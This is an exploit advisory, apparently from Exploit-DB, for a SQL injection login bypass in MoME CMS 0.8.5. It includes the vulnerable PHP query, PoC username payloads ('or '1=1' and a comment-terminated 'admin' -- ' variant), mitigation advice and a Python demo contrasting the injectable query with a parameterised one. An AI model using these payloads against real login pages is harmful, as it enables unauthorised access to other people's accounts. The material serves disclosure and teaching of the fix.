vendor:
MoME CMS
by:
cr4wl3r
N/A
CVSS
N/A
Remote Login Bypass
CWE
Product Name: MoME CMS
Affected Version From: 0.8.5
Affected Version To: 0.8.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2010

MoME CMS <= 0.8.5 Remote Login Bypass Exploit

This exploit allows remote attackers to bypass the login of MoME CMS 0.8.5 and earlier. The login handler drops the posted username and password straight into the SQL string without escaping, so a single quote in the username ends the string literal and lets the attacker rewrite the rest of the WHERE clause (SQL injection). It works only when magic_quotes_gpc is turned off, because with it enabled PHP backslash-escapes the quote before the script sees it. The vulnerability was discovered by cr4wl3r; the code snippet below shows the vulnerable query and the PoC shows the injected username.

Mitigation:

Enabling magic_quotes_gpc blocks this particular PoC, but only as a stop-gap: the directive was deprecated in PHP 5.3 and removed in PHP 5.4, so it cannot be relied on. The proper fix is to stop interpolating request data into SQL at all and use prepared statements with bound parameters (or, at minimum, escape the values with mysql_real_escape_string before concatenating them). Upgrade to a newer version of MoME CMS if one is available.
Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |    MoME CMS <= 0.8.5 Remote Login Bypass Exploit   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/mome/files/
[!] Date: 16.01.2010
[!] Remote: yes


[!] Code :


// check user and password from login
if (isset($_POST['posted_username']) && isset($_POST['posted_password'])) {
    // POST values are interpolated straight into the SQL text with no escaping,
    // so a single quote in either field ends the string literal
    $query = "SELECT * FROM users WHERE username='$_POST[posted_username]' AND
        password=md5('$_POST[posted_password]')";
    // ... the query is then run; a returned row logs the user in
}


[!] PoC:

    username : ' or '1=1
    password : cr4wl3r
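
To make the failure mode concrete, the following is an added example, not part of the original advisory and not MoME CMS code: it rebuilds the quoted query over an in-memory SQLite database in Python. md5() is registered as a user function because SQLite lacks MySQL's built-in, and the single 'admin' account with password 's3cret' is constructed sample data. The block prints the SQL text that the PoC above produces, runs it, then uses the same unescaped username field with an assumed comment-terminated input (admin' -- , not from the page) to drop the password check entirely, and finally shows the parameterised query that defeats both. Note that AND binds tighter than OR, so the PoC input becomes username='' OR ('1=1' AND password=md5('cr4wl3r')) and still needs the password to match; against the constructed account it therefore returns no row, which the built query text makes visible.

```python
import hashlib
import sqlite3

# Constructed sample data for this demo (not from the advisory).
SAMPLE_USER = "admin"
SAMPLE_PASSWORD = "s3cret"
# The PoC input quoted in the advisory.
POC_USERNAME = "' or '1=1"
POC_PASSWORD = "cr4wl3r"
# Assumed attacker input, not from the page: closes the username literal and
# comments out the rest of the WHERE clause. MySQL requires whitespace after
# "--", hence the trailing space (SQLite accepts it either way).
COMMENT_USERNAME = "admin' -- "


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the CMS users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no md5(); register one so the query text can match the PHP.
    conn.create_function("md5", 1, md5_hex)
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        (SAMPLE_USER, md5_hex(SAMPLE_PASSWORD)),
    )
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Same interpolation as the PHP snippet: POST fields land inside the SQL text."""
    return (
        f"SELECT * FROM users WHERE username='{username}' "
        f"AND password=md5('{password}')"
    )


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str):
    """Runs the interpolated query; returns the matched username or None."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[1] if row else None


def safe_login(conn: sqlite3.Connection, username: str, password: str):
    """Bound parameters: the values travel separately from the SQL text, so a
    quote in the input can never terminate the string literal."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=md5(?)",
        (username, password),
    ).fetchone()
    return row[1] if row else None


if __name__ == "__main__":
    conn = make_db()
    print(build_vulnerable_query(POC_USERNAME, POC_PASSWORD))
    print("PoC input, vulnerable query:", vulnerable_login(conn, POC_USERNAME, POC_PASSWORD))
    print("comment variant, vulnerable query:", vulnerable_login(conn, COMMENT_USERNAME, "x"))
    print("comment variant, parameterised:", safe_login(conn, COMMENT_USERNAME, "x"))
    print("real credentials, parameterised:", safe_login(conn, SAMPLE_USER, SAMPLE_PASSWORD))
```

The interesting line is the one vulnerable_login builds for the comment variant: the username literal is closed after admin and everything from -- onward, including the password comparison, is a comment, so the row comes back on the username alone. The parameterised version returns None for the same input because the driver hands the whole string, quote and dashes included, to the database as a value.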